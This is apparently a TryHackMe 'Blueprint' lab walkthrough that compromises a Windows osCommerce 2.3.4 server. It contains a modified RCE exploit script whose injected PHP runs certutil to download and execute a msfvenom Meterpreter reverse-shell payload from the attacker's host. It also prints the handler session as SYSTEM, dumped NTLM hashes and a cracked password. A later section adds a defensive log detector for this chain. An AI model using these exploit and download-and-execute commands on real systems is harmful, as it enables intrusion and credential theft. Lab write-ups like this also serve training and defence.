Tryhackme - Blueprint

In this walkthrough, we will be going through the Blueprint room from Tryhackme. This room is rated as Easy on the platform, and the objective is to hack into this Windows machine and escalate our privileges to Administrator to capture the root flag. So, let’s get started without any delay.

Blueprint

Machine Info:

Title: Blueprint
IP address: 10.10.209.244
Difficulty: Easy
Objective: Hack into this Windows machine and escalate your privileges to Administrator.

Enumeration:

  • I started off with a regular nmap scan with service version detection and found multiple open ports, as expected on a Windows machine. Some of the interesting ones were 80, 8080 and 443 (HTTP/HTTPS), 139 and 445 (SMB), and 3306 (MySQL).

sudo nmap -sS -sV 10.10.209.244

nmap scan

  • Enumerated the web server running on port 80 and found a 404 error there.

404 Server error

  • Next, I pivoted to port 443, which has directory listing enabled; there we found that osCommerce 2.3.4 is installed on the server.

Index of

  • We can access the same on port 8080.

Welcome to eshop

  • Next, I moved on to SMB enumeration and found a couple of shares, but according to smbmap I was unable to access any of them.

smbclient -L 10.10.209.244

smbclient

smbmap -H 10.10.209.244

smbmap access denied

  • Ran gobuster against the osCommerce installation and found a bunch of interesting directories.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.209.244:8080/oscommerce-2.3.4/catalog/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.209.244:8080/oscommerce-2.3.4/catalog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/29 12:41:49 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 1046]
/.hta                 (Status: 403) [Size: 1046]
/.htpasswd            (Status: 403) [Size: 1046]
/ADMIN                (Status: 301) [Size: 371] [--> 
/Admin                (Status: 301) [Size: 371] [--> 
/Images
/admin                                            
/download           
/ext                                           
/images                                      
/install              (Status: 301) [Size: 373] [--> 
/pub                  (Status: 301) [Size: 369] [-->   

-- snipped --

                        
===============================================================
2023/11/29 12:44:14 Finished
===============================================================

gobuster scan

  • Next, searched for known exploits for this osCommerce version using searchsploit and found an RCE exploit.

searchsploit oscommerce 2.3.4

searchsploit oscommerce 2.3.4

oscommerce 2.3.4.1 - Remote Code Execution

Initial Access:

  • Copied the exploit to my working directory.

searchsploit -m php/webapps/44374.py

copy the exploit

  • Changed the target and base URL in the exploit and executed it. However, the PHP system() function was disabled on the server for security reasons.

changing parameters in exploit

python 44374.py

python exploit

configure.php

  • So I generated a Windows Meterpreter payload named shell.exe using msfvenom. The idea is to download the payload directly onto the server with certutil and execute it through configure.php to get a shell back.

wh1terose@fsociety:~/CTF/TryHackme/Blueprint$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe
Running the 'init' command for the database:
Existing database found, attempting to start it
Starting database at /home/wh1terose/.msf4/db...pg_ctl: another server might be running; trying to start server anyway
server starting
success
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

msfvenom payload generate

  • Modified the exploit for the new payload.

import requests

# enter the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.18.1.78:8000/shell.exe shell.exe & shell.exe");'  # this is where you enter your PHP payload
payload += 'echo $var;'   
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")

changing parameters in exploit

  • I spun up a web server hosting the payload and ran the exploit. Once I requested the configure.php file, I received a connection back at my Metasploit multi/handler with administrative privileges (NT AUTHORITY\SYSTEM).
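From the defender's side, the trace this step leaves in the web server's access log is a POST to the installer's step 4 followed by a request for the configure.php that step wrote. The following is an added detection example, not part of the walkthrough or of osCommerce: the log lines are constructed in common log format to mirror the request sequence above, and the path layout assumes the default oscommerce-2.3.4/catalog/install/ location shown on this page. It flags any request that reaches the installer directory, which is not needed once the shop is deployed, and rates the two requests that make up this exploit chain as high severity.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format) modelled on the
# request sequence in this walkthrough: the exploit POSTs to the installer's
# step 4, then the attacker fetches the configure.php that step wrote.
SAMPLE_LOG = """\
10.18.1.78 - - [29/Nov/2023:13:28:10 +0530] "GET /oscommerce-2.3.4/catalog/index.php HTTP/1.1" 200 5120
10.18.1.78 - - [29/Nov/2023:13:29:40 +0530] "POST /oscommerce-2.3.4/catalog/install/install.php?step=4 HTTP/1.1" 200 2231
10.18.1.78 - - [29/Nov/2023:13:29:52 +0530] "GET /oscommerce-2.3.4/catalog/install/includes/configure.php HTTP/1.1" 200 0
10.18.1.78 - - [29/Nov/2023:13:30:05 +0530] "GET /oscommerce-2.3.4/catalog/install/ HTTP/1.1" 200 842
"""

# Minimal common-log-format parser: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def detect_installer_abuse(log_text):
    """Return one alert per request that touches the osCommerce installer.

    After deployment the install/ directory is dead weight; any request to it
    is suspicious, and the POST to step 4 plus the fetch of the generated
    configure.php are the signature of the chain used in this walkthrough.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m["target"])
        path = parts.path
        if "/install/" not in path:
            continue  # ordinary shop traffic
        step = parse_qs(parts.query).get("step", [None])[0]
        if m["method"] == "POST" and path.endswith("/install/install.php") and step == "4":
            severity, reason = "high", "installer step 4 invoked (rewrites configure.php)"
        elif path.endswith("/install/includes/configure.php"):
            severity, reason = "high", "direct request for generated configure.php"
        else:
            severity, reason = "medium", "installer directory still reachable"
        alerts.append({"ip": m["ip"], "time": m["ts"], "path": path,
                       "status": m["status"], "severity": severity, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in detect_installer_abuse(SAMPLE_LOG):
        print(f'{a["severity"]:6} {a["ip"]} [{a["time"]}] {a["path"]}: {a["reason"]}')
```

On the constructed log the detector produces two high alerts and one medium alert and ignores the index.php request. The medium alert is the one worth acting on before any exploit appears: if the installer directory is still reachable after deployment, remove it, and the step 4 write path disappears with it.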

python exploit

python http server

configure.php

Index of oscommerce 2.3.4

wh1terose@fsociety:~$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.18.1.78
LHOST => 10.18.1.78
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.18.1.78:4444 
[*] Sending stage (175686 bytes) to 10.10.209.244
[*] Meterpreter session 1 opened (10.18.1.78:4444 -> 10.10.209.244:49477) at 2023-11-29 13:29:53 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

nt authority/system

Getting Flags:

  • As the first flag requires, I dumped the user hashes with hashdump and cracked the NTLM hash of the user “Lab” on CrackStation, which gave the password googleplus.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::

hashdump

Crackstation cracking

  • Finally, dumped the root flag and completed the room.

root flag

Task 1 – Blueprint

Question 1 – “Lab” user NTLM hash decrypted

Question 2 – root.txt

Conclusion:

So that was “Blueprint” for you. We first started with an nmap scan with the service version detection flag set and found many open ports: 80, 8080 and 443 (HTTP/HTTPS), 139 and 445 (SMB), and 3306 (MySQL). Next, enumerated the web server on ports 80, 443 and 8080 and found an osCommerce installation. Looked for known exploits for osCommerce version 2.3.4 and found an RCE exploit. Next, generated a Meterpreter payload using msfvenom and used the exploit to upload and execute it on the server, giving us a shell back at our handler with root permissions. At last, dumped and cracked the hashes and captured the root flag to complete the room and my first night after marriage. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
